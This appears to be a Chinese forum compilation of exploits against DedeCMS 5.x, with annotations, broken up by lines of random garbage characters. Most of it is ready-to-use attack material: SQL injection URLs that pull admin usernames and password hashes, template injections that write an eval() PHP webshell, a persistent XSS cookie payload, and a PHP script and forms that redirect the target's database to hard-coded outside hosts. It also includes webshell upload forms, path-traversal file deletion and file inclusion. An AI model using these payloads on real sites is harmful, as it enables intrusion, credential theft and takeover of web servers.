|
|
Dedecms 5.6 plus/rss.php SQL注入漏洞
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
（报错注入：通过 _Cs 数组参数把 updatexml() 拼进 SQL，从 dede_admin 读出 uname 和 MID(pwd,4,16)，在报错信息里回显为 [用户名:16位hash]（0x5b/0x3a/0x5d 即 [ : ]）。取出的 16 位就是常见的 16 位 MD5，原因见下文 advancedsearch 一节对 pwd 字段的说明。）
$ q/ l+ m# Z4 t; \4 Q3 S' Y9 @( V1 S `: U/ g" z4 s x
3 U! M* G% B$ R' V* z# [% o
1 D! W. [! b$ F' n5 K0 ^! N" D9 R4 J5 x- j
, d# X# y$ l1 N) z/ Q2 _. f" w$ ?+ B. t2 e1 e
5 t1 R- f7 a# M- x
DedeCms v5.6 嵌入恶意代码执行漏洞（会员上传软件时"本地地址"字段的模板标签注入）
注册会员，上传软件：在"本地地址"中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
（从 payload 形态看，name 属性里的 ']=0; 先闭合模板引擎生成的数组下标，其后的 PHP 语句随即被执行；具体拼接点需对照模板引擎源码确认。）
发表后，查看或修改该条记录即可触发执行。
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成 x.php，密码 xiao，直接生成一句话木马（两段 base64 分别解码为文件名 x.php 和内容 <?php eval($_POST[xiao])?>baidu）。
" d) ? a, e/ u6 u" k; `' p8 b, ^, P6 E5 o. L, Q4 @3 W- a* J
0 a2 Q' Z% a' H8 t+ [) r
" i4 A1 b0 L" c" g& O0 D z+ T m+ K8 `" J
& d8 S. e. I4 P6 O2 {
1 z. U& m& b6 V, t4 z
" w ]& L0 n$ o
Dede 5.6 GBK SQL注入漏洞（member/index.php 的 uid 参数）
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
（%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7 是 UTF-8 编码的"涛声依旧"。三条 URL 的思路看起来都是宽字节注入：站点按 GBK 解码时，这些多字节序列可以把转义用的反斜杠吞进一个汉字里，从而闭合引号；第一条还附带了 || 的逻辑探测。）
! u+ B' y. P- J- x& p. u3 e3 A b$ c& ?
1 r7 ^3 ~+ N" C6 `' Y# D7 U7 c
. a, r. k* t' K# C( Q0 P0 F; H) ~- P' p. G9 o
3 {1 p' T7 D) j9 p' [
' r0 E# t5 ]- J; F0 h
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
/ s! h6 m$ U; ~% E0 V* N. p5 E
J' D, W2 T7 C1 Q
* L7 c- x9 M! |1 ^; Z
! J: x* f. p7 {6 ~: P, {+ H0 g1 b1 P. J8 D T
2 R! L7 R# K# q4 M p6 I3 u
DEDECMS 全版本 gotopage变量XSS漏洞
1. 复制粘贴下面的 URL 访问，触发 XSS 并"安装" XSS rootkit（即把 payload 持久化到 cookie 里）。注意 IE8/9 等会拦截 URL 型 XSS，需关闭其 XSS 筛选器。
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
8 d8 L! n7 o5 y' f, B' l3 r' ~7 O/ f, [3 |
s7 ? ^9 f( R: r
2. 关闭浏览器后再打开，访问下面任意 URL（带不带 gotopage 参数都一样）都会再次触发 XSS。原因：上面 String.fromCharCode 解码后的脚本把 payload 写入名为 gotopage 的 cookie（有效期 365 天）；只要 login.php 继续把 gotopage 的取值回显到页面（从现象看它也读取 cookie 中的该值），XSS 就持续存在。
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
5 m' X$ Y0 J0 u1 L7 f) y
http://v57.demo.dedecms.com/dede/login.php
4 \9 J$ q8 P8 k$ y+ t* v3 ~2 Z* T. u0 v" ]/ J+ Z5 @
DeDeCMS(织梦)变量覆盖getshell（plus/mytag_js.php）
（下面的 PHP 脚本通过 POST _COOKIE[GLOBALS][cfg_db*] 字段把目标的数据库连接参数改写为脚本里硬编码的 MySQL 服务器 184.105.174.114（exploit/90sec），前提是该库中已准备好含 {dede:php} 的 dede_mytag 记录，见下文"标签远程文件写入漏洞"一节的 INSERT。脚本里的地址、账号和口令都是原作者的，不是漏洞本身的一部分。）
6 k' h6 h; a+ c/ r/ B6 O( ~9 x#!usr/bin/php -w2 ^' N2 o8 T9 N
<?php
) q- {4 T7 h1 K, Xerror_reporting(E_ERROR);: \- G+ O+ D3 `/ M( v
set_time_limit(0);! J, |7 N$ S$ w2 u1 Y) r+ @" \
print_r('
+ V; u; |/ p u, ZDEDEcms Variable Coverage
7 x) k4 t: @! w! N9 H3 y' IExploit Author: www.heixiaozi.comwww.webvul.com& O7 w8 }. a5 d* t
);
0 T" S0 F) U6 \* s5 xecho "\r\n";& G7 o3 y1 K: y' z0 q
if($argv[2]==null){) U5 d, N, g2 N) M4 f
print_r('
3 H7 S2 X( m+ i, X6 Z0 d+---------------------------------------------------------------------------+
9 V& l8 P( c/ XUsage: php '.$argv[0].' url aid path. Q1 c1 f1 d4 A% w
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/! E5 o: { ^# Z+ n( M
Example:
" V, ~- [' Q. E' I. K( T- B4 Sphp '.$argv[0].' www.site.com 1 old" |- {( s6 D8 X/ A
+---------------------------------------------------------------------------+
" V' ~& Y* Y. {* C');% E% d. ]& f% M$ F4 D s
exit;
$ c$ Q7 o! R7 Q, U3 r- z) K}
7 K$ i" c5 `# B8 t3 a; m$url=$argv[1]; o8 x+ [% \. A) |: A6 T6 a
$aid=$argv[2];( y) I5 b" \ j6 K, g1 ?
$path=$argv[3];
" s! n& q% i7 m( I8 d K/ g3 [, ]5 N' G$exp=Getshell($url,$aid,$path);3 X( A. U. F. H; P) t
if (strpos($exp,"OK")>12){
7 p4 i: P/ z7 _2 Q: E& ?0 r/ Wecho "
- X" B7 Q p! M8 f9 [' mExploit Success \n";
( S8 }( g3 m4 Y9 O2 }$ `, J0 Pif($aid==1)echo "
2 s4 ~4 U, t9 W O/ |0 a) ^Shell:".$url."/$path/data/cache/fuck.php\n" ;
1 E3 R8 Q. G4 H5 l
" S) B; I0 {* D0 s
* G/ k; s3 h- a! zif($aid==2)echo "
- Z& e% L: M z7 S0 _" @Shell:".$url."/$path/fuck.php\n" ;
" p" k6 K( }& c# U: _7 l' |! e3 _' G- W+ j/ F0 H' ^" c
) K) H! w% t( A* d( T p+ t
if($aid==3)echo "
4 [* `" d' s3 C. i3 YShell:".$url."/$path/plus/fuck.php\n";
7 \0 I8 p- i4 K
1 ~6 ^8 s- G/ `# K6 N; W" G2 J2 Q9 X8 g5 F2 {; r, ] f
}else{9 @1 a" f: P' {+ ~
echo "7 g, w9 `$ D1 N, K
Exploit Failed \n";9 h9 H" T1 `( X) L. ?
}9 }! [, ^( N2 Q' M5 n+ w# F; p
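/**
 * Send the variable-override POST to http://$url:80/$path/plus/mytag_js.php
 * and return the first line of the HTTP response (the status line).
 *
 * @param string $url   target hostname; used as the TCP target and Host: header
 * @param string $aid   value for the aid query-string parameter
 * @param string $path  install directory below the web root. "" yields a
 *                      request line of "POST //plus/mytag_js.php…", exactly as
 *                      the original did — callers installed at the root relied
 *                      on the web server collapsing the double slash.
 * @return string  status line such as "HTTP/1.1 200 OK", or '' when the socket
 *                 could not be opened or nothing could be read
 */
function Getshell($url, $aid, $path) {
    $id   = $aid;
    $host = $url;
    $port = 80;

    // Form body. The _COOKIE[GLOBALS][cfg_db*] fields are the override: they
    // point the target's database connection at the hard-coded MySQL server
    // 184.105.174.114 (user "exploit", password "90sec", database "exploit",
    // prefix "dede_"), so the target fetches its dede_mytag row for aid=1 from
    // a server the script's author controlled. Those values are the author's
    // own infrastructure, not a generic part of the technique; the HTML form
    // version of this request elsewhere on the page posts the same fields.
    // %CC%E1%BD%BB is the submit button's value "提交" in GBK.
    $content = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";

    $data  = "POST /$path/plus/mytag_js.php?aid=" . $id . " HTTP/1.1\r\n";
    $data .= "Host: " . $host . "\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    // Accept-Encoding deliberately left out (as in the original): the status
    // line is read as plain text and a compressed body is never parsed.
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: " . strlen($content) . "\r\n\r\n";
    $data .= $content . "\r\n";

    // The original opened the socket without errno/errstr/timeout and then
    // wrote to it even when the connect had failed; fail early instead. The
    // caller's strpos() check treats '' as failure.
    $ock = fsockopen($host, $port, $errno, $errstr, 10);
    if (!$ock) {
        echo "\nNo response from " . $host . "\n";
        return '';
    }
    fwrite($ock, $data);

    // The original returned from inside a while(!feof()) loop on the first
    // fgets(), i.e. it only ever read the status line and never closed the
    // socket. Keep that contract (the caller matches "OK" in the status line)
    // but release the socket.
    $exp = fgets($ock, 1024);
    fclose($ock);
    return $exp === false ? '' : $exp;
}
?>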
j. B) F9 A. a
0 W# ?$ Q% B3 N7 a& q& ~9 m/ |9 [! e. F+ W ^5 i% q* l) s
" s4 c, M: S( l/ v+ ?& ]: X' {
/ G6 h$ f$ K/ @! m
8 \4 y) H: `. l
+ O2 j2 D/ E) _' @+ }% v. l, o
8 u I6 y( n2 P7 | v: D# d7 E' E5 R
3 z" D( p u7 N; `- ]
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
) i7 o" g( T7 h# H" ^: r. }5 G
把上面 validate=dcug 改为当前验证码，即可直接进入网站后台。从参数看原理与上文变量覆盖相同：login.php 用 _POST[GLOBALS][cfg_db*] 覆盖数据库连接参数，登录校验因此改为查询攻击者控制的 MySQL（示例中 116.255.183.90，root/r0t0，库名 root），其中准备好的管理员记录 admin/inimda 自然能通过校验。示例里的地址与口令是原作者的，不是通用参数。
/ x; z; O( s9 P G5 T6 m
8 M' K4 A; H3 A+ V
此漏洞的前提是必须先得到后台路径，且 validate 验证码要与当前会话一致。
2 z5 G0 W W/ g2 ?; t
9 m# I; O; g- D X' H7 L* Y# d# q8 q' A0 z. v
2 q2 N& A8 m5 z. q
4 J, Y, B, E% o e: L: i8 y
2 d3 y. \" S/ T( f4 ^4 `
+ }- P# h. `* ~5 Z M
l/ y6 p7 a, c( [( {/ I1 @1 x/ ?. X6 R" c9 D! J
Dedecms织梦 标签远程文件写入漏洞（plus/mytag_js.php 变量覆盖，与上文 PHP 脚本是同一原理的手工版本）
前提条件：必须先准备好自己的 dede 数据库，并插入数据： insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
（原文里的单引号被论坛双写成了 ''，上面已还原。注意 fwrite 的内容在原文中就是空字符串，照抄只会得到一个空的 1.php，要写入的内容需自行填入。）
! T8 S' {3 X C3 x) A8 g, ~2 g8 H' M3 _7 H
再用下面表单提交，shell 就在同目录下的 1.php。原理：表单把 _COOKIE[GLOBALS][cfg_db*] 作为 POST 字段提交给 plus/mytag_js.php，覆盖目标的数据库连接参数，目标随即到攻击者的数据库取 aid=1 的 dede_mytag 记录并解析其中的 {dede:php}；fopen("1.php") 是相对路径，落点由 mytag_js.php 运行时的工作目录决定（通常即 plus/）。
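<!--
  Manual version of the DedeCMS variable-override request against
  plus/mytag_js.php. The _COOKIE[GLOBALS][cfg_db*] fields override the target's
  database settings, so it loads the dede_mytag row for aid=1 from the MySQL
  server named here; the row with {dede:php} must already exist there (see the
  INSERT above this form). dbhost/dbuser/dbpwd/dbname are placeholders for that
  server's settings; nocache=true and the QuickSearchBtn submit button are
  posted alongside them, as in the PHP script version on this page.

  Fix vs. the original listing: addaction() was defined but never called, so
  with action="" the form posted back to the page it was opened from. It now
  runs from onsubmit and copies the doaction URL into the form's action.
-->
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at whatever URL was typed into the doaction field.
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>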
% w7 I! }" ?2 b3 E! g5 }2 t4 H9 C) I
" X7 T5 ]: W, c7 W% u7 o
# b V/ R7 `# t
& T$ D( |& O+ |! J
: R! v$ s: K9 ?7 y( f7 Q2 L. f3 d9 J0 b. x4 \
8 k8 J5 w9 r1 {0 b4 u* ~* q& b) z( c5 J6 y7 n6 f% d" V* q$ Y
DedeCms v5.6 嵌入恶意代码执行漏洞（与上文同一条，重复收录）
注册会员，上传软件：在"本地地址"中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
Dedecms <= V5.6 Final 模板执行漏洞（会员把已上传的图片替换成模板文件，再通过 member/article_edit.php 把文章的 templet 字段指向它）
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
. r! u2 R9 U! u# B, J: G; Suploads/userup/2/12OMX04-15A.jpg
* g4 X5 P$ Y* t0 k# K
: m2 t) e4 a, e/ n' m$ b d+ Z j0 G
模板内容是(如果限制图片格式,加gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. 修改刚刚发表的文章，查看源文件，据此构造一个表单（aid、idhash、sortrank 等隐藏字段必须取自真实页面，下面的值只是示例）：
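<!--
  Rebuilt from the member-side "edit article" page of a local DedeCMS install
  (http://127.0.0.1/dede/), with two fields added — templet and
  dede_addonfields — marked below. aid, idhash and sortrank are per-article
  values copied from the real edit page and have to be replaced for any other
  article. Fixes vs. the original listing: the body value contained raw
  double quotes (now entity-encoded so the attribute does not end early), and
  stray spaces had crept into "../ uploads/…" and "127.0.0.1 /dede/…".
-->
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<!--
  The injected part. templet is the path that ends up stored as the article's
  template; it points at the "image" uploaded earlier, which is really a
  template with a runphp='yes' tag. dede_addonfields presumably lists the extra
  field names article_edit.php will accept from the POST (that is how templet
  gets through) — inferred from the steps above; confirm against
  member/article_edit.php.
-->
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(这里构造)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="&lt;div&gt;&lt;a href=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; alt=&quot;&quot; src=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; width=&quot;1010&quot; height=&quot;456&quot; /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;&lt;?phpinfo()?&gt;1111111&lt;/p&gt;" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&amp;Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>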
" E" k4 W& q3 c' M: x2 Z+ ~9 t
* U/ N4 W9 p$ p' h( p
提交后若提示修改成功，说明文章的模板路径已被改写。
3. 访问修改后的文章：
假设刚刚修改的文章 aid 为 2，则只需访问：
http://127.0.0.1/dede/plus/view.php?aid=2
即可在 plus 目录下生成 webshell 1.php（模板里的 fopen("1.php") 是相对路径，落在执行它的 plus/view.php 所在目录）。
# z2 g3 F/ j6 L. m4 U
' ^/ z) S9 d' c @8 O. ^. Y k" F$ ]2 R' V$ G
/ C: w M) w& N. p& C
* ]5 v: {! G* z' c/ p1 C0 t
' m( G7 P6 V# i \+ r5 T/ w" Z! [, d7 L, q% m' U2 \6 x `
$ n: W7 O- M. Y& A" H5 `5 H* S; ]9 j# U
& |# m* n- b$ s7 U, J2 g- y$ L3 j
. p/ \$ }+ N% O: j
% ?1 V6 s* O8 | ^ f6 a! u+ i! g9 V- _0 P. e
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
保存为 1.gif（开头的 Gif89a 是 GIF 文件头，用来通过图片格式检查；runphp='yes' 的标签体会被模板引擎当作 PHP 执行）
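<!--
  Member-side "replace attachment" request. oldurl is the path the replacement
  is written back to (the text below this form confirms the file lands at
  /uploads/userup/3/1.gif), so the upload overwrites the earlier image with the
  1.gif template built above. aid=7 is the attachment's id on the author's
  test install; mediatype=1 and title=1.jpg presumably keep it classified as an
  image — confirm against member/uploads_edit.php.
  Fixes vs. the original listing: a stray '">' inside the <form> tag and the
  invalid </br> closing tag.
-->
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>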
7 p) B3 S. i" H- k# t# x, C" N2 M( ]% U* g
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
发表文章，然后构造修改表单如下（aid、idhash、sortrank 同样要取自真实的编辑页面）：
2 Y! w( F4 h! \1 X$ R. o! [
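<!--
  Second variant of the article-edit request (same technique as the 127.0.0.1
  form earlier on this page): dede_addonfields="templet" lets the templet
  field through, and templet points the article's template at the 1.gif
  uploaded by the form above. aid, idhash and sortrank are per-article values
  from the author's test install and must be taken from the real edit page.
  Fix vs. the original listing: the typeid <select> was never closed, so the
  mtypesid <select> was nested inside it.
-->
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<!-- injected fields: the template path, relative to wherever DedeCMS resolves templet from (not shown on this page) -->
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>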
( K0 M. i6 o' L! G. w" T/ @& D6 ` m m
" U1 }. n, C8 |! L1 n; @8 @5 Q. s# T' ~7 D1 O6 `' A& `
* h! f; B- W1 |1 T9 A
9 z" f* J0 h8 _
7 N) G/ C( K' u L+ q
; d+ V. R7 c# r: k$ ]0 O9 z3 B$ Y% c+ Q
7 m4 Q! i3 A) h, L1 o
! ?6 D! W9 T* R9 w" Q4 n
. T8 {) ?6 C: z4 t' y+ S' W6 {/ O; h
织梦(Dedecms) V5.6 远程文件删除漏洞（member/edit_face.php 的 oldface 参数目录穿越）
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
（payload 以 /uploads/userup/8/ 开头再接 ../，说明校验很可能只看路径前缀，之后可穿越到网站目录下的任意文件；示例删除的是 member/templets/images/m_logo.gif。）
/ T3 m9 e2 g' U2 L' ?1 N& R1 L% A( y) g y4 |; k' c: V
* z7 R/ D# a, q. e( ?/ U# }: n# N
: S' X; | @1 I. P% I& u5 n. d0 T6 [
: Y6 [& b1 Z. y& ?) m3 n2 A8 R! m
* |. D" d9 H$ c, j! w5 q/ R
& l8 c* b5 r9 ]1 d$ p6 `: {5 z& K0 g3 s" R
& P; v" O3 @9 Z+ @1 R2 J8 m8 y: R' \* W! a7 z9 A% k! x
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
http://www.test.com/plus/carbuya ... urn&code=../../
（原链接已被论坛折叠截断，中间的参数缺失，只能看出 code 参数携带 ../../ 目录穿越；完整参数需另行查证。）
( w5 e# h9 H0 P* {
+ ^5 o# D7 R0 Z; s
" n' K0 i, o: I o( n% |
/ J. X9 w- O* ]6 E
1 U) U$ A4 G7 [. W7 Y( Z1 ?
; g1 w/ O( V' ` F4 w/ a- U
' \4 N- O: c( U4 Z% m( M
A; S" u1 T _7 @% s3 h/ m8 J3 C2 a( _4 B: m
0 G' u' z/ P: k+ }
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
（%23@__ 即 #@__，DedeCMS SQL 里的表前缀占位符，默认前缀下对应 dede_admin；sql 参数被直接执行，与上文是同一条。）
" K& F- y r1 e; P密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
! a1 m/ @2 J: J, g) @
. Q( j: f- g1 ?) q0 b
7 ~1 Y6 c8 z4 t3 l4 S$ { ^' U9 w: p' `! ^& n. r
2 Q# E1 i( D+ g3 _! a" P- Q+ Q' i1 F# M5 o- O+ y0 C( {7 c
& _+ f) E( ^; T' N
) H/ k/ t4 f6 o% @7 ^& S3 U4 L h( n2 ]; ~8 ~# g& p6 z9 ]7 |( f+ r
( s/ Z2 e- l. [1 ]+ }# X! y& w+ ?5 c: W5 z- |
织梦(Dedecms) 5.1 plus/feedback_js.php 注入漏洞（arcurl 参数，union 注入读取 dede_admin 的 userid/pwd）
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
; A* K$ Q* ^2 ?; F/ @
( v. Q) t. J" h+ N* J
. c# `3 X9 ^) `) [6 X0 O$ Q
) {: G% v) n3 ~' j( _; p4 O }* d" N8 N6 {. o9 L# C7 U: f
' ^* v* A) C+ C0 `
8 Z, ~) S- ?6 `- g
& m, {% }& {- F& u# E% I0 C. | ?) Z6 a/ t1 I* R1 Y
+ W5 U/ Q0 Y. m }
织梦(Dedecms) include/dialog/select_soft_post.php 页面变量未初始化漏洞（需 register_globals=On：表单里 POST 的 cfg_* 字段直接覆盖上传白名单和目录配置）
<!--
  Upload form for include/dialog/select_soft_post.php. Every cfg_* field here
  is a DedeCMS configuration variable that the script never initialises, so
  with register_globals=On the POSTed values win: cfg_imgtype/cfg_softtype/
  cfg_mediatype=php put .php on the allowed list, cfg_not_allowall=txt
  narrows the deny list, and cfg_basedir + activepath select the destination
  directory. newname fixes the stored filename, giving /data/cache/fly.php
  (as the page's own footer text states). Without register_globals the
  overrides have no effect.
-->
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form name="myform" method="POST" enctype="multipart/form-data" action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php">
<!-- destination: cfg_basedir is joined with activepath -->
<input type="hidden" name="activepath" value="/data/cache/" />
<input type="hidden" name="cfg_basedir" value="../../" />
<!-- file-type whitelist / blacklist overrides -->
<input type="hidden" name="cfg_imgtype" value="php" />
<input type="hidden" name="cfg_not_allowall" value="txt" />
<input type="hidden" name="cfg_softtype" value="php" />
<input type="hidden" name="cfg_mediatype" value="php" />
<!-- dialog plumbing expected by the script -->
<input type="hidden" name="f" value="form1.enclosure" />
<input type="hidden" name="job" value="upload" />
<input type="hidden" name="newname" value="fly.php" />
Select U Shell <input type="file" name="uploadfile" size="25" />
<input type="submit" name="sb1" value="确定" />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
